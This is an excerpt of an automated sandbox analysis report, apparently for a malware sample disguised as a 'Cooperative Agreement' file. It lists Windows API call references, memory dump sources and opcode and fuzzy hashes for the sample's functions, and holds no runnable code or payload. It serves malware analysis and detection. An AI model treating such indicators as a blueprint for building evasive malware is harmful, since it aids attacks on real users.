                                                                                                                                                                                                                                        • API String ID: 368790112-0
                                                                                                                                                                                                                                        • Opcode ID: 6af7cb9f910f70f93df9e3bab83db51edc5e588b158ebd52074512bae1687c56
                                                                                                                                                                                                                                        • Instruction ID: 0935afcf37e6329c3ac2d0f56793f6a9f9fc9668031c2f15978d8007e640a3dc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6af7cb9f910f70f93df9e3bab83db51edc5e588b158ebd52074512bae1687c56
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 322103317506083BE524AA29DC86F9F738CDB81708F40063EF241BA2C1CA79E54947AE
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocHeapwcsncpy
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2304708654-0
                                                                                                                                                                                                                                        • Opcode ID: abff55b24cf8305edd91d71e69c9c0649d4e3fc2b61a87c9063bbd8ae977bd8a
                                                                                                                                                                                                                                        • Instruction ID: a3f43ae3cc8438659badc3904afd778ac5f48c872593279c616423bb3bd2bb8e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: abff55b24cf8305edd91d71e69c9c0649d4e3fc2b61a87c9063bbd8ae977bd8a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D51AD34508B059BDB209F28D844A6B77F4FF84348F544A2EF885A72D0E778E915CB99
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406696
                                                                                                                                                                                                                                        • CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066D0
                                                                                                                                                                                                                                        • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066FF
                                                                                                                                                                                                                                        • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406705
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CharLower
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1615517891-0
                                                                                                                                                                                                                                        • Opcode ID: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
                                                                                                                                                                                                                                        • Instruction ID: 50cff0fc212774e4e1f85142edc8b720228546f3e888a8e5f893537154114361
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 582176796043058BC710AF1D9C40077B7E4EB80364F86483BEC85A3380D639EE169BA9
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412271
                                                                                                                                                                                                                                        • malloc.MSVCRT ref: 00412281
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041229B
                                                                                                                                                                                                                                        • malloc.MSVCRT ref: 004122B0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiWidemalloc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2735977093-0
                                                                                                                                                                                                                                        • Opcode ID: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
                                                                                                                                                                                                                                        • Instruction ID: 3c1085fe75aa08d7dfcf325d5fd6ce3d1ff6e0efa089dc1519f7c1eb2db8e9d3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F70145373413013BE2204685AC02FAB3B58CBC1B95F1900BAFF04AE6C0C6F3A80182B8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D0B8,00000000), ref: 004121D4
                                                                                                                                                                                                                                        • malloc.MSVCRT ref: 004121E4
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00412201
                                                                                                                                                                                                                                        • malloc.MSVCRT ref: 00412216
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiWidemalloc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2735977093-0
                                                                                                                                                                                                                                        • Opcode ID: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
                                                                                                                                                                                                                                        • Instruction ID: ba92e613a2f9bf0a88025da3432e472bc54701246ba04d0c993b0b67be8a7a27
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9401F57B38130137E3205695AC42FBB7B59CB81B95F1900BAFB05AE2C1D6F76814C6B9
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SHGetFolderLocation.SHELL32(00000000,02399740,00000000,00000000,00000000,00000000,00000000,?,00000104,0040A91B,00000000,00000000,00000104,?), ref: 0040A97E
                                                                                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040A98F
                                                                                                                                                                                                                                        • wcslen.MSVCRT ref: 0040A99A
                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000104,0040A91B,00000000,00000000,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000), ref: 0040A9B8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4012708801-0
                                                                                                                                                                                                                                        • Opcode ID: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
                                                                                                                                                                                                                                        • Instruction ID: 15676ea375ba95ce47a4ad1d62f3a4f85f84cc5ccd71b7d74cdbb22097095955
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51F0D136610614BAC7205B6ADD08DAB7B78EF06660B414126F805E6250E7308920C7E5
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 004053EA: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 004053F5
                                                                                                                                                                                                                                          • Part of subcall function 004053EA: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405428
                                                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405472
                                                                                                                                                                                                                                          • Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B
                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 85618057-0
                                                                                                                                                                                                                                        • Opcode ID: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
                                                                                                                                                                                                                                        • Instruction ID: 3069acd899a723a1849542c16efb52ddeba99d38bb4cb8d15d413c759c742d3e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CDF05432905610AFC2205F619C48AE77B79EF54767715843FF94573190D73868408E6E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                                                                                          • Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02390000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                                          • Part of subcall function 00402E9D: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402EC5
                                                                                                                                                                                                                                          • Part of subcall function 00402E9D: __fprintf_l.LIBCMT ref: 00402F1F
                                                                                                                                                                                                                                          • Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
                                                                                                                                                                                                                                          • Part of subcall function 00409355: memset.MSVCRT ref: 00409381
                                                                                                                                                                                                                                          • Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                                                                                                                                                                                                                                          • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                                                                                                                                                                                                                                          • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                                                                                                                                                                                                                                          • Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
                                                                                                                                                                                                                                          • Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
                                                                                                                                                                                                                                          • Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
                                                                                                                                                                                                                                          • Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
                                                                                                                                                                                                                                          • Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                                                                                                                                                                                                                                          • Part of subcall function 00403CD7: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A61,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403D07
                                                                                                                                                                                                                                        • PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 004031CC
                                                                                                                                                                                                                                          • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                                        • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,023981B8,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 00403231
                                                                                                                                                                                                                                          • Part of subcall function 00402CA9: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402D44
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
                                                                                                                                                                                                                                        • String ID: $pA
                                                                                                                                                                                                                                        • API String ID: 790731606-4007739358
                                                                                                                                                                                                                                        • Opcode ID: f33b77279b43f6c2a7ef6627287f9fc20ba1f8a50c04e803199af3b471e760de
                                                                                                                                                                                                                                        • Instruction ID: fee6f31afef46dfc3d4b18dc130868db542cea1a9d30875f0fa626089c73850b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f33b77279b43f6c2a7ef6627287f9fc20ba1f8a50c04e803199af3b471e760de
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E151F6B5904A007EE2007BF2DD82E3F266EDFD4719B10893FF844B9092C93C994DA66D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004025A3
                                                                                                                                                                                                                                        • PathRemoveArgsW.SHLWAPI(?), ref: 004025D9
                                                                                                                                                                                                                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                                          • Part of subcall function 004098C0: SetEnvironmentVariableW.KERNELBASE(02399740,02399740,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                                          • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                                          • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                                                                                                                                                                                                                          • Part of subcall function 0040DF50: HeapFree.KERNEL32(02390000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
                                                                                                                                                                                                                                        • String ID: *pA
                                                                                                                                                                                                                                        • API String ID: 1199808876-3833533140
                                                                                                                                                                                                                                        • Opcode ID: 11b1f39d3e9737ca0d6b51d618b1608c274ee9a255191aaff6a0b6077b3e1a9a
                                                                                                                                                                                                                                        • Instruction ID: 21a80edfc212e2aa9d277187ee9bfa0e7f9d15baa35618845dd156f20ee28a4c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11b1f39d3e9737ca0d6b51d618b1608c274ee9a255191aaff6a0b6077b3e1a9a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C412DB5904701AED600BBB2DD8293F77ADEBD4309F108D3FF544A9092CA3CD849966E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040D2E8: TlsGetValue.KERNEL32(?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D2EF
                                                                                                                                                                                                                                          • Part of subcall function 0040D2E8: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D30A
                                                                                                                                                                                                                                          • Part of subcall function 0040D2E8: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D319
                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value$AllocCommandHeapLine
                                                                                                                                                                                                                                        • String ID: $"
                                                                                                                                                                                                                                        • API String ID: 1339485270-3817095088
                                                                                                                                                                                                                                        • Opcode ID: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
                                                                                                                                                                                                                                        • Instruction ID: ab659b79707db7d7869a667e669445cd4c695224699636d93eb587c6e0e94742
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A31A7735252218ADB74AF10981127772A1EFA2B60F18C17FE4926B3D2F37D8D41D369
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsicmpwcscmp
                                                                                                                                                                                                                                        • String ID: $0A
                                                                                                                                                                                                                                        • API String ID: 3419221977-513306843
                                                                                                                                                                                                                                        • Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                                                                                                                                                                                                                                        • Instruction ID: ce5e94a217663c04e8d70dd0a479d34a80eb67d33ce446282a7f9ad79867738e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E11C476108B0A8FD3209F46D440923B3E9EF94364720843FD849A3791DB75FC218B6A
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405722
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405746
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
